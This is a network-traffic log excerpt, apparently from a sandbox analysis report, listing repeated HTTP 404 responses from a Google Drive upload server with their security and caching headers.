                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5WqrzH-iPZTlEjnXDTWu7TyS72tZNy28xrTz2JtzN-hadObIFDR7nOeXLbLfPfjclDweZMlE4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-r3eitq1jYeCaWXAZSPMktQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Fqi1WEa4vOyMmeEVhklbldU-zCzDqQFLefD4J-3jXHsEGqS0aWAZ9weZ2mspWs8nuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QYOnLRHkUscQmDqoGKOnXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5kOVb6EiQlqtJQDYGI0ZmvdSbNulljCgX2ZpsbiuSwJMMTy-vMpfLsrD5Hzn8xqVq2NHTkjeEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:31 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-2vVI3D0txNiowbpljG4p6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OGUATBHgrtDcHSnYYu6lCvyUGhv2fCV21VFJ_jizsWf9ECfgEuTekPiiDXLPZBHpVs9jr4KEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:31 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-feFVvzDZNrhSDYsxHwz6nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4EzsRKrBu9FhKt6J3CUuMh9W5cow9zHzfUe2dRlTHUuR0aqMykNB-nVo3iScPTbDHAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:33 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5Sp1dFGG0iWXwbcPEsMLAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4vcSrFk-P-LMPSmKHRwHzmxRA89AF0AyXwqnznfOjh8AT3Ee_HHW_jLxs981dI9kilpTgPFJoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-07XxVIQgEImtkQ3hVF_pqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6xzXpcRTWfL75zHpV14dn1NgtAKmnqxVUzYvUOU5yaN9XdBohUKZ8MB1GAXlGpLndJc7AFJdUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-t9wCgFSuqBUEmMNNfHKTIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7GjGE-49O9I31UEoaiWcLDUWizZAd9twj5mLhylU_gMbBmmK7UbVSG61ojqVU9jkopContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-q0mTk5a1OiJuqLfm70a9TA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7f2R-Ln9sxCZ1V9qdd3pGbqz3PVnqL5IjxmlIxNb0-EorCIcjgVNlaLnECtvNkq9-eE47CCFYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:36 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ilGmHQ_vIBhYqmtMzTsWyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4NCBMgi7G-4LAn1MyG1WMoMjoEXoulmAPzDROhJbf3LflGGwwW4pTHD8BcWVGtasQDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:37 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-O5s2LizMmCAOpXAAe0lsqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ruK0iiav8JQLI4WBuFj9JNUw2dfPfBaTVfXOWmUxac1FwijbaYryQi9oqDM3zC9UDContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:38 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-WVeUAUrpSemWsjNN8wh0wg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6D5N13Y7TGrD-5pfuNfvj9KsRSQ4iT93yn9dItJPpRKAVfEQEDvKau5W1-6ypYqGNMQZZT62oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:38 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JqARA-EHGD53P54Ehum3Mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5TI44KuAiaGSVdU8lzrUV_GQXaN-2AbfZHS1yx-WeWkhzqrxRFQTWTOVf4H3NrcqqXnREaQeQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Yvx-WzZ6JZLWLh_eT4ldyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7844ZfGNrjVhaf3vU5Ju4NxlqGFYLgPgi-Yoo8hVnQNDKhQE4EYiWAx73-82k0KfhdBbpbZRYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:40 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-P5Af1yApeYDXqWoT2uCgmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5CzDo_FtB39TJzDw6GwqxirherOIsT3ADIh8yveGppJFES7smRoGhp5_AYJaTKLk2HContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:40 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-STrcSdIr9w9GSW4mlBlgCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4mTkxQfD6slFYlKiIDa5Xp8NCaZLbQbL-MucZaIfdQkf4Aaw9ZTQh-wsTUJCCu2-CIOqevVXQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WaD2cNBNyaYOTGqI0vZVhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7X8dyy_e1n58NecZ86QoYs_lReU4PlRbn0VnVDsgucjsCGC-vqUV3ituuLSl8ZWX0rContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:42 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-YL8pAXngCP4KnyZdAlhRNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7aNzI4yEC8CgD9aiKgj4eUucX6BK2T5aa1aMJbTjbYdL3u83z85NAJ7awCi0jtH5NbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-drS7t90JXhtHZ3vNi3upig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75UZipVANjR65__xWzm5r7pUD9WtlbzYZ9QCzke8_mbEV8uqmNWgy4SW_CPWddI5iUrUL9HxIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3IpjTYeT79GdBHwWzPPKLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5T1N7q-7UOUebp9wQmH8fuoClZyg7s-3qyj6JaoIN_F4r7hz5RLDDRYY2k6jusId-GR6xCGPUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:36:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-J7mT4MINVBsFLD6BNePS4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
